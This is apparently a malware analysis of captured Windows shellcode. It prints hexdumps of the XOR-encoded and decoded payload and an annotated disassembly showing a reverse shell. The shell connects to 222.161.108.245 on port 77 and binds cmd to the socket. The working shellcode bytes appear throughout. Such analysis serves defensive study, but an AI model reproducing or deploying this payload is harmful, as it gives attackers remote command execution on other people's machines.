Pinneberg Shellcode

Shellcode

raw

hexdump

00000000  00 00 23 f8 29 00 ff 23  05 39 1e c8 68 22 39 05  |..#ø).ÿ#.9.Èh"9.|
00000010  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000030  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000060  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
00000070  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000080  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000090  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000000c0  7c f4 3d 05 68 22 39 05  68 22 39 05 68 22 39 05  ||ô=.h"9.h"9.h"9.|
000000d0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
000000e0  68 22 39 05 68 22 39 05  7c f4 3d 05 7c f4 3d 05  |h"9.h"9.|ô=.|ô=.|
000000f0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000120  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000140  68 22 39 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  |h"9.|ô=.|ô=.|ô=.|
00000150  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000170  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 68 22 39 05  ||ô=.|ô=.|ô=.h"9.|
00000180  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
000001a0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000001d0  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
000001e0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
000001f0  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000200  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000230  7c f4 3d 05 68 22 39 05  68 22 39 05 68 22 39 05  ||ô=.h"9.h"9.h"9.|
00000240  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000250  68 22 39 05 68 22 39 05  7c f4 3d 05 7c f4 3d 05  |h"9.h"9.|ô=.|ô=.|
00000260  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000290  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
000002b0  68 22 39 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  |h"9.|ô=.|ô=.|ô=.|
000002c0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000002e0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 68 22 39 05  ||ô=.|ô=.|ô=.h"9.|
000002f0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000310  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000340  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
00000350  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000360  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000370  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000003a0  7c f4 3d 05 90 90 90 90  90 90 90 90 90 90 90 90  ||ô=.............|
000003b0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000450  90 90 90 90 90 90 90 90  eb 10 5a 4a 33 c9 66 b9  |........ë.ZJ3Éf¹|
00000460  77 01 80 34 0a 99 e2 fa  eb 05 e8 eb ff ff ff cd  |w..4..âúë.èëÿÿÿÍ|
00000470  12 75 1a 75 b1 12 6d 71  60 99 99 99 10 9f 66 af  |.u.u±.mq`.....f¯|
00000480  f1 17 d7 97 75 71 9d 98  99 99 10 df 9d 66 af f1  |ñ.×.uq.....ß.f¯ñ|
00000490  eb 67 2a 8f 71 6c 99 99  99 10 df 91 66 af f1 76  |ëg*.ql....ß.f¯ñv|
000004a0  57 79 f9 71 7f 99 99 99  10 df 95 f1 aa ab 99 99  |Wyùq.....ß.ñª«..|
000004b0  f1 ee ea ab c6 cd 66 cf  9d 10 df 89 66 ef 89 f1  |ñîê«ÆÍfÏ..ß.fï.ñ|
000004c0  40 90 6c 34 71 5c 99 99  99 10 df 8d 66 ef 89 f1  |@.l4q\....ß.fï.ñ|
000004d0  75 60 33 f9 71 2c 99 99  99 10 df 81 66 ef 89 f1  |u`3ùq,....ß.fï.ñ|
000004e0  7e e0 5f e0 71 3c 99 99  99 10 df 85 66 ef 89 f1  |~à_àq<....ß.fï.ñ|
000004f0  52 74 65 a2 71 0c 99 99  99 10 df b9 18 75 09 98  |Rte¢q.....ß¹.u..|
00000500  99 99 cd f1 98 98 99 99  66 cf b9 c9 c9 c9 c9 d9  |..Íñ....fϹÉÉÉÉÙ|
00000510  c9 d9 c9 66 cf 8d 12 41  f1 47 38 f5 6c f1 9b 99  |ÉÙÉfÏ..AñG8õlñ..|
00000520  99 d4 12 55 f3 89 c8 ca  66 cf 81 1c 59 ec da f1  |.Ô.Uó.ÈÊfÏ..YìÚñ|
00000530  fa f4 fd 99 10 ff a9 1a  75 cd 14 a5 bd aa 50 1a  |úôý..ÿ©.uÍ.¥œªP.|
00000540  58 8c 32 7b 64 5f dd bd  89 dd 67 dd bd a4 10 c5  |X.2{d_Ýœ.ÝgÝœ€.Å|
00000550  bd d1 10 c5 bd d5 10 c5  bd c9 14 dd bd 89 cd c9  |œÑ.ÅœÕ.ÅœÉ.Ýœ.ÍÉ|
00000560  c8 c8 c8 f3 98 c8 c8 66  ef a9 c8 66 cf 91 ca 66  |ÈÈÈó.ÈÈfï©ÈfÏ.Êf|
00000570  cf 85 66 cf 95 cc cf fd  38 a9 99 99 99 12 d9 95  |Ï.fÏ.ÌÏý8©....Ù.|
00000580  12 e9 85 34 12 f1 91 12  5c c7 c4 5b 9d 99 ca cc  |.é.4.ñ..\ÇÄ[..ÊÌ|
00000590  cf ce 12 f5 bd 81 12 dc  a5 12 cd 9c e1 9a 4c 12  |ÏÎ.õœ..Ü¥.Í.á.L.|
000005a0  d3 81 12 c3 b9 9a 44 7a  ab d0 12 ad 12 9a 6c aa  |Ó..ù.Dz«Ð.­..lª|
000005b0  66 65 aa 59 35 a3 5d ed  9e 58 56 94 9a 61 72 6b  |feªY5£]í.XV..ark|
000005c0  a2 e5 bd 8d ec 78 12 c3  bd 9a 44 ff 12 95 d2 12  |¢åœ.ìx.Ü.Dÿ..Ò.|
000005d0  c3 85 9a 44 12 9d 12 9a  5c 72 9b aa 59 12 4c c6  |Ã..D....\r.ªY.LÆ|
000005e0  c7 c4 c2 5b 9d 99 00 90  90 90 90 90 90 90 90 90  |ÇÄÂ[............|
000005f0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000023f0  90 90 90 90 90 90 90 90  90 90 90 90              |............|
000023fc

unxor'd

00000000  00 00 23 f8 29 00 ff 23  05 39 1e c8 68 22 39 05  |..#ø).ÿ#.9.Èh"9.|
00000010  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000030  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000060  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
00000070  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000080  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000090  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000000c0  7c f4 3d 05 68 22 39 05  68 22 39 05 68 22 39 05  ||ô=.h"9.h"9.h"9.|
000000d0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
000000e0  68 22 39 05 68 22 39 05  7c f4 3d 05 7c f4 3d 05  |h"9.h"9.|ô=.|ô=.|
000000f0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000120  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000140  68 22 39 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  |h"9.|ô=.|ô=.|ô=.|
00000150  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000170  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 68 22 39 05  ||ô=.|ô=.|ô=.h"9.|
00000180  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
000001a0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000001d0  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
000001e0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
000001f0  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000200  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000230  7c f4 3d 05 68 22 39 05  68 22 39 05 68 22 39 05  ||ô=.h"9.h"9.h"9.|
00000240  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000250  68 22 39 05 68 22 39 05  7c f4 3d 05 7c f4 3d 05  |h"9.h"9.|ô=.|ô=.|
00000260  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000290  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
000002b0  68 22 39 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  |h"9.|ô=.|ô=.|ô=.|
000002c0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000002e0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 68 22 39 05  ||ô=.|ô=.|ô=.h"9.|
000002f0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000310  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000340  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
00000350  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000360  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000370  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000003a0  7c f4 3d 05 90 90 90 90  90 90 90 90 90 90 90 90  ||ô=.............|
000003b0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000460  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 54  |...............T|
00000470  8b ec 83 ec 28 8b f4 e8  f9 00 00 00 89 06 ff 36  |.ì.ì(.ôèù.....ÿ6|
00000480  68 8e 4e 0e ec e8 04 01  00 00 89 46 04 ff 36 68  |h.N.ìè.....F.ÿ6h|
00000490  72 fe b3 16 e8 f5 00 00  00 89 46 08 ff 36 68 ef  |rþ³.èõ....F.ÿ6hï|
000004a0  ce e0 60 e8 e6 00 00 00  89 46 0c 68 33 32 00 00  |Îà`èæ....F.h32..|
000004b0  68 77 73 32 5f 54 ff 56  04 89 46 10 ff 76 10 68  |hws2_TÿV..F.ÿv.h|
000004c0  d9 09 f5 ad e8 c5 00 00  00 89 46 14 ff 76 10 68  |Ù.õ­èÅ....F.ÿv.h|
000004d0  ec f9 aa 60 e8 b5 00 00  00 89 46 18 ff 76 10 68  |ìùª`èµ....F.ÿv.h|
000004e0  e7 79 c6 79 e8 a5 00 00  00 89 46 1c ff 76 10 68  |çyÆyè¥....F.ÿv.h|
000004f0  cb ed fc 3b e8 95 00 00  00 89 46 20 81 ec 90 01  |Ëíü;è.....F .ì..|
00000500  00 00 54 68 01 01 00 00  ff 56 20 50 50 50 50 40  |..Th....ÿV PPPP@|
00000510  50 40 50 ff 56 14 8b d8  68 de a1 6c f5 68 02 00  |P@PÿV..ØhÞ¡lõh..|
00000520  00 4d 8b cc 6a 10 51 53  ff 56 18 85 c0 75 43 68  |.M.Ìj.QSÿV..ÀuCh|
00000530  63 6d 64 00 89 66 30 83  ec 54 8d 3c 24 33 c9 83  |cmd..f0.ìT.<$3É.|
00000540  c1 15 ab e2 fd c6 44 24  10 44 fe 44 24 3d 89 5c  |Á.«âýÆD$.DþD$=.\|
00000550  24 48 89 5c 24 4c 89 5c  24 50 8d 44 24 10 54 50  |$H.\$L.\$P.D$.TP|
00000560  51 51 51 6a 01 51 51 ff  76 30 51 ff 56 08 53 ff  |QQQj.QQÿv0QÿV.Sÿ|
00000570  56 1c ff 56 0c 55 56 64  a1 30 00 00 00 8b 40 0c  |V.ÿV.UVd¡0....@.|
00000580  8b 70 1c ad 8b 68 08 8b  c5 5e 5d c2 04 00 53 55  |.p.­.h..Å^]Â..SU|
00000590  56 57 8b 6c 24 18 8b 45  3c 8b 54 05 78 03 d5 8b  |VW.l$..E<.T.x.Õ.|
000005a0  4a 18 8b 5a 20 03 dd e3  32 49 8b 34 8b 03 f5 33  |J..Z .Ýã2I.4..õ3|
000005b0  ff fc 33 c0 ac 3a c4 74  07 c1 cf 0d 03 f8 eb f2  |ÿü3À¬:Ät.ÁÏ..øëò|
000005c0  3b 7c 24 14 75 e1 8b 5a  24 03 dd 66 8b 0c 4b 8b  |;|$.uá.Z$.Ýf..K.|
000005d0  5a 1c 03 dd 8b 04 8b 03  c5 eb 02 33 c0 8b d5 5f  |Z..Ý....Åë.3À.Õ_|
000005e0  5e 5d 5b c2 04 00 00 90  90 90 90 90 90 90 90 90  |^][Â............|
000005f0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000023f0  90 90 90 90 90 90 90 90  90 90 90 90              |............|
000023fc

Analysis

XOR decoder (uses bielefeld xor): single-byte key 0x99 applied to the 0x177 bytes that follow the decoder stub (CX = 177h, XOR BYTE PTR [EDX+ECX],99)

00421A39   EB 10            JMP SHORT dummy2.00421A4B
00421A3B   5A               POP EDX
00421A3C   4A               DEC EDX
00421A3D   33C9             XOR ECX,ECX
00421A3F   66:B9 7701       MOV CX,177
00421A43   80340A 99        XOR BYTE PTR DS:[EDX+ECX],99
00421A47  ^E2 FA            LOOPD SHORT dummy2.00421A43
00421A49   EB 05            JMP SHORT dummy2.00421A50
00421A4B   E8 EBFFFFFF      CALL dummy2.00421A3B
	 

unxor'd shellcode

00421A50   54               PUSH ESP
00421A51   8BEC             MOV EBP,ESP
00421A53   83EC 28          SUB ESP,28
00421A56   8BF4             MOV ESI,ESP
00421A58   E8 F9000000      CALL dummy2.00421B56
00421A5D   8906             MOV DWORD PTR DS:[ESI],EAX
00421A5F   FF36             PUSH DWORD PTR DS:[ESI]
00421A61   68 8E4E0EEC      PUSH EC0E4E8E
00421A66   E8 04010000      CALL dummy2.00421B6F
00421A6B   8946 04          MOV DWORD PTR DS:[ESI+4],EAX             ; store LoadLibraryA
00421A6E   FF36             PUSH DWORD PTR DS:[ESI]
00421A70   68 72FEB316      PUSH 16B3FE72
00421A75   E8 F5000000      CALL dummy2.00421B6F
00421A7A   8946 08          MOV DWORD PTR DS:[ESI+8],EAX             ; store CreateProcessA
00421A7D   FF36             PUSH DWORD PTR DS:[ESI]
00421A7F   68 EFCEE060      PUSH 60E0CEEF
00421A84   E8 E6000000      CALL dummy2.00421B6F
00421A89   8946 0C          MOV DWORD PTR DS:[ESI+C],EAX             ; store ExitThread
00421A8C   68 33320000      PUSH 3233
00421A91   68 7773325F      PUSH 5F327377
00421A96   54               PUSH ESP
00421A97   FF56 04          CALL DWORD PTR DS:[ESI+4]                ; call LoadLibraryA("ws2_32") - the two pushes above spell the DLL name
00421A9A   8946 10          MOV DWORD PTR DS:[ESI+10],EAX
00421A9D   FF76 10          PUSH DWORD PTR DS:[ESI+10]
00421AA0   68 D909F5AD      PUSH ADF509D9
00421AA5   E8 C5000000      CALL dummy2.00421B6F
00421AAA   8946 14          MOV DWORD PTR DS:[ESI+14],EAX            ; store WSASocketA
00421AAD   FF76 10          PUSH DWORD PTR DS:[ESI+10]
00421AB0   68 ECF9AA60      PUSH 60AAF9EC
00421AB5   E8 B5000000      CALL dummy2.00421B6F
00421ABA   8946 18          MOV DWORD PTR DS:[ESI+18],EAX            ; store connect
00421ABD   FF76 10          PUSH DWORD PTR DS:[ESI+10]
00421AC0   68 E779C679      PUSH 79C679E7
00421AC5   E8 A5000000      CALL dummy2.00421B6F
00421ACA   8946 1C          MOV DWORD PTR DS:[ESI+1C],EAX            ; store closesocket
00421ACD   FF76 10          PUSH DWORD PTR DS:[ESI+10]
00421AD0   68 CBEDFC3B      PUSH 3BFCEDCB
00421AD5   E8 95000000      CALL dummy2.00421B6F
00421ADA   8946 20          MOV DWORD PTR DS:[ESI+20],EAX            ; store WSAStartup
00421ADD   81EC 90010000    SUB ESP,190
00421AE3   54               PUSH ESP
00421AE4   68 01010000      PUSH 101
00421AE9   FF56 20          CALL DWORD PTR DS:[ESI+20]               ; call WSAStartup
00421AEC   50               PUSH EAX
00421AED   50               PUSH EAX
00421AEE   50               PUSH EAX
00421AEF   50               PUSH EAX
00421AF0   40               INC EAX
00421AF1   50               PUSH EAX
00421AF2   40               INC EAX
00421AF3   50               PUSH EAX
00421AF4   FF56 14          CALL DWORD PTR DS:[ESI+14]               ; call WSASocketA
00421AF7   8BD8             MOV EBX,EAX
00421AF9   68 DEA16CF5      PUSH F56CA1DE                            ; ip: sin_addr, bytes DE A1 6C F5 = 222.161.108.245
00421AFE   68 0200004D      PUSH 4D000002                            ; port: sin_family = AF_INET (2), sin_port = 0x004D in network order = TCP/77
00421B03   8BCC             MOV ECX,ESP
00421B05   6A 10            PUSH 10
00421B07   51               PUSH ECX
00421B08   53               PUSH EBX
00421B09   FF56 18          CALL DWORD PTR DS:[ESI+18]               ; call connect
00421B0C   85C0             TEST EAX,EAX
00421B0E   75 43            JNZ SHORT dummy2.00421B53
00421B10   68 636D6400      PUSH 646D63
00421B15   8966 30          MOV DWORD PTR DS:[ESI+30],ESP
00421B18   83EC 54          SUB ESP,54
00421B1B   8D3C24           LEA EDI,DWORD PTR SS:[ESP]
00421B1E   33C9             XOR ECX,ECX
00421B20   83C1 15          ADD ECX,15
00421B23   AB               STOS DWORD PTR ES:[EDI]
00421B24  ^E2 FD            LOOPD SHORT dummy2.00421B23
00421B26   C64424 10 44     MOV BYTE PTR SS:[ESP+10],44
00421B2B   FE4424 3D        INC BYTE PTR SS:[ESP+3D]
00421B2F   895C24 48        MOV DWORD PTR SS:[ESP+48],EBX
00421B33   895C24 4C        MOV DWORD PTR SS:[ESP+4C],EBX
00421B37   895C24 50        MOV DWORD PTR SS:[ESP+50],EBX
00421B3B   8D4424 10        LEA EAX,DWORD PTR SS:[ESP+10]
00421B3F   54               PUSH ESP
00421B40   50               PUSH EAX
00421B41   51               PUSH ECX
00421B42   51               PUSH ECX
00421B43   51               PUSH ECX
00421B44   6A 01            PUSH 1
00421B46   51               PUSH ECX
00421B47   51               PUSH ECX
00421B48   FF76 30          PUSH DWORD PTR DS:[ESI+30]
00421B4B   51               PUSH ECX
00421B4C   FF56 08          CALL DWORD PTR DS:[ESI+8]                ; call CreateProcessA ("cmd", ten args; STARTUPINFO cb=44h, hStdInput/Output/Error = socket in EBX) - slot [ESI+8] resolved above
00421B4F   53               PUSH EBX
00421B50   FF56 1C          CALL DWORD PTR DS:[ESI+1C]               ; call closesocket
00421B53   FF56 0C          CALL DWORD PTR DS:[ESI+C]                ; call ExitThread
00421B56   55               PUSH EBP
00421B57   56               PUSH ESI
00421B58   64:A1 30000000   MOV EAX,DWORD PTR FS:[30]
00421B5E   8B40 0C          MOV EAX,DWORD PTR DS:[EAX+C]
00421B61   8B70 1C          MOV ESI,DWORD PTR DS:[EAX+1C]
00421B64   AD               LODS DWORD PTR DS:[ESI]
00421B65   8B68 08          MOV EBP,DWORD PTR DS:[EAX+8]
00421B68   8BC5             MOV EAX,EBP
00421B6A   5E               POP ESI
00421B6B   5D               POP EBP
00421B6C   C2 0400          RETN 4
00421B6F   53               PUSH EBX
00421B70   55               PUSH EBP
00421B71   56               PUSH ESI
00421B72   57               PUSH EDI
00421B73   8B6C24 18        MOV EBP,DWORD PTR SS:[ESP+18]
00421B77   8B45 3C          MOV EAX,DWORD PTR SS:[EBP+3C]
00421B7A   8B5405 78        MOV EDX,DWORD PTR SS:[EBP+EAX+78]
00421B7E   03D5             ADD EDX,EBP
00421B80   8B4A 18          MOV ECX,DWORD PTR DS:[EDX+18]
00421B83   8B5A 20          MOV EBX,DWORD PTR DS:[EDX+20]
00421B86   03DD             ADD EBX,EBP
00421B88   E3 32            JECXZ SHORT dummy2.00421BBC
00421B8A   49               DEC ECX
00421B8B   8B348B           MOV ESI,DWORD PTR DS:[EBX+ECX*4]
00421B8E   03F5             ADD ESI,EBP
00421B90   33FF             XOR EDI,EDI
00421B92   FC               CLD
00421B93   33C0             XOR EAX,EAX
00421B95   AC               LODS BYTE PTR DS:[ESI]
00421B96   3AC4             CMP AL,AH
00421B98   74 07            JE SHORT dummy2.00421BA1
00421B9A   C1CF 0D          ROR EDI,0D
00421B9D   03F8             ADD EDI,EAX
00421B9F  ^EB F2            JMP SHORT dummy2.00421B93
00421BA1   3B7C24 14        CMP EDI,DWORD PTR SS:[ESP+14]
00421BA5  ^75 E1            JNZ SHORT dummy2.00421B88
00421BA7   8B5A 24          MOV EBX,DWORD PTR DS:[EDX+24]
00421BAA   03DD             ADD EBX,EBP
00421BAC   66:8B0C4B        MOV CX,WORD PTR DS:[EBX+ECX*2]
00421BB0   8B5A 1C          MOV EBX,DWORD PTR DS:[EDX+1C]
00421BB3   03DD             ADD EBX,EBP
00421BB5   8B048B           MOV EAX,DWORD PTR DS:[EBX+ECX*4]
00421BB8   03C5             ADD EAX,EBP
00421BBA   EB 02            JMP SHORT dummy2.00421BBE
00421BBC   33C0             XOR EAX,EAX
00421BBE   8BD5             MOV EDX,EBP
00421BC0   5F               POP EDI
00421BC1   5E               POP ESI
00421BC2   5D               POP EBP
00421BC3   5B               POP EBX
00421BC4   C2 0400          RETN 4
00421BC7   0090 90909090    ADD BYTE PTR DS:[EAX+90909090],DL
00421BCD   90               NOP
 